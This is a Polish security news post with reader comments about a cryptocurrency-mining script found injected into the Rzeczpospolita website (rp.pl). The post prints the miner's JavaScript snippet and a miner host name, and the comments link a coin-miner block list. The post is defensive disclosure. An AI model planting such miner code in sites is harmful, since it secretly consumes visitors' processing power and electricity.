15:38
11/1/2018

Czytelnik @szescstopni na Twitterze zwrócił nam uwagę na wpis internautki, która wchodząc na stronę Rzeczpospolitej zobaczyła ostrzeżenie od swojego antywirusa:

Skrypt ten w istocie kopie kryptowalutę (config dostępny tu)


var miner = new Client.Anonymous('cabf0512bc5e1173a7a52df989519fbdbe9111562604d6ba56ac255cba853b4f', {
throttle: 0.8
});
miner.start();

…i wszystko wskazuje na to, że nie został on tam świadomie umieszczony przez Rzeczpospolitą. I paradoksalnie w tej historii chyba jest najgorsze, bo oznacza, że teraz na stronie jest stosunkowo niegroźny skrypt kopiący kryptowalutę, ale nie wiadomo od jak dawna ten skrypt się tam znajduje i czy wcześniej wstrzyknięty skrypt nie miał innej, groźniejszej zawartości (por. Jak przeprowadzono atak na KNF).

Sugerujemy wstrzymanie się z wizytą na rp.pl dopóki administratorzy nie ogarną tematu. Osoby, które odwiedziły RP powinny wyczyścić cache przeglądarki, a generalnie dobrym pomysłem (bo problem kopania kryptowalut przez strony internetowe jest coraz powszechniejszy) jest zainstalować sobie jakieś rozszerzenie do blokowania JavaScriptu, np. uMatrix, o którego zaletach w szczegółach pisaliśmy w tym artykule.

Przeczytaj także:

29 komentarzy

Dodaj komentarz
  1. Ostatnio też się spotkałem z tym komunikatem i nie tylko na rzeczpospolitej.

  2. Chciałem podejrzeć ten plik JS ale chyba jest zaszyfrowany
    Można mu zrobić było by psikusa i zgłosić do kopalni wtedy by mu zbanowali konto :)

  3. Nie znam się, więc proszę o wyjaśnienie.
    1. Czy ten skrypt został wgrany na serwer rp.pl i z tej strony się uruchamiał?
    2. Jak dodatek do przeglądarki zablokuje taki skrypt, jeśli domyślnie zezwala na uruchamianie skryptów ze strony, którą się odwiedza?

  4. Cześć,
    szczerze mówiąc – jestem początkujący. Mam pytanie odnośnie fragmentu artykułu, cyt. “wszystko wskazuje na to, że nie został on tam świadomie umieszczony przez Rzeczpospolitą.”
    Czy mógłby ktoś, niekoniecznie wchodząc w szczegóły, wytłumaczyć jak można umieścić skrypt JS na nie swojej stronie?

    Pozdrawiam

    • np. poprzez skrypty reklamodawców

  5. Ze skryptu kopiącego przynajmniej ktoś ma jakiś pożytek. W przeciwieństwie do ton innego badziewia JS jakim wypchane jest wiele stron. Czasem to nawet nie są reklamy.

    • Żeby to był właściciel strony i robił to jawnie to może przymknąłbym oko, jakby miał zużycie na 50%,ale nie gdy robi to nie wiadomo kto i to przy wykorzystaniu 100% mojego leciwego laptopa.

    • Ale wszyscy odwiedzający stronę na tym tracą. Chociażby na rachunku za prąd. I w przeciwieństwie do sytuacji z reklamami, nawet nie są tego świadomi.

    • Sęk w tym, że to odwiedzający stronę ponosi koszty kopania kryptowaluty – staje się takim kopaczem-zoombie ;)

    • Oczywiście, że odwiedzający na tym tracą ale ktoś (też wolałbym, żeby to był właściciel strony, żeby robił to jawnie i żeby nie zżerał 100%) przynajmniej na tym zyskuje więc nie jest to tak bezsensowne jak różne javascriptowe ozdobniki na których też odwiedzający tracą (też potrafią zjeść 100% procesora i utrudniać korzystanie ze strony) a nikt nie zyskuje.

  6. I zrobiła się Hackpospolita! :)

  7. Byłem przez chwilą na stronie rp.pl i nie wykryłem żadnych koparek.

  8. Te minerki to nic nowego są praktycznie wszędzie, jak ktoś ma laptopa to to słychać jak ci nagle wentylatory wyją , ważniejszym pytaniem jest kto i jak zainfekował te strony skryptem.

    Dodatkowo tu macie skryp do adblocka/ublocka który powinnien to blokować
    https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/nocoin.txt

  9. U mnie od kilku dni Bitdefender regularnie pokazuje komunikat w którym blokuje stronę internetową (stratum.premiumstats.xyz/lib/worker.wasm) ze względu na zagrożenie o nazwie “Application.BitCoinMiner.ZV”. Nigdy na tą stronę nie “wchodziłem”. Korzystam codziennie tylko z kilku popularnych stron www, więc rozumiem, że ten “kopacz monet” musiał się gdzieś “zagnieździć” na którejś z nich. Antywirus skutecznie blokuje to zagrożenie i nie powoduje to zwiększenia zużycia mocy procesora, ale jest do denerwujące, kiedy w ciągu dnia dostajesz około 40 komunikatów o zablokowanym zagrożeniu.

  10. Ale jak zakomentowany, śmiesznie aby nie zauważyć :)

  11. Możecie sprawdzić, czy któreś listy filtrów z ublocka blokują ten skrypt?

  12. A co ze stroną niebezpiecznik.pl?
    Świeżo zainstalowałem noscripta i oto co podaje:

    “NoScript detected a potential Cross-Site Scripting attack

    from […] to https://niebezpiecznik.pl.

    Suspicious data:

    (URL) https://niebezpiecznik.pl/post/uwaga-na-strone-rzeczpospolitej-zawiera-zlosliwy-skrypt/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+niebezpiecznik+(Niebezpiecznik.pl+-+wszystko)

  13. Skoro RP, to i Parkiet.com. Widzę, że rypie po procesorze i grafice jak RP.

  14. Przestaje kopać po zamknięciu karty.

    • Teraz wystarczy dodać pop-undera lub tab-undera ;-)

  15. Na morele.net inny skrypt – może jakaś nowa dziura
    https://i.imgur.com/bFbHF1q.png

  16. Wygląda na variant ataku typu XSS. Zwróćcie uwagę na początek komentarza. – mniejsze minus minus większe.

  17. Stoją na word-pressie – hxxp://www.rp.pl/wp-login.php wyświetla co innego niż wp-login i wp-login1.php. Warto więc przejrzeć inne strony na wordpressie czy nie ma nowej podatności.

  18. Wooo…..no PFS + root CA w certyfikacie :D
    https://www.ssllabs.com/ssltest/analyze.html?d=ufg.pl
    IIS 7.0 mam nadzieję, że to nie Vista ;)

  19. Process Explorer w trayu i od razu widać gdy przeglądarka zaczyna robić podejrzane rzeczy.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.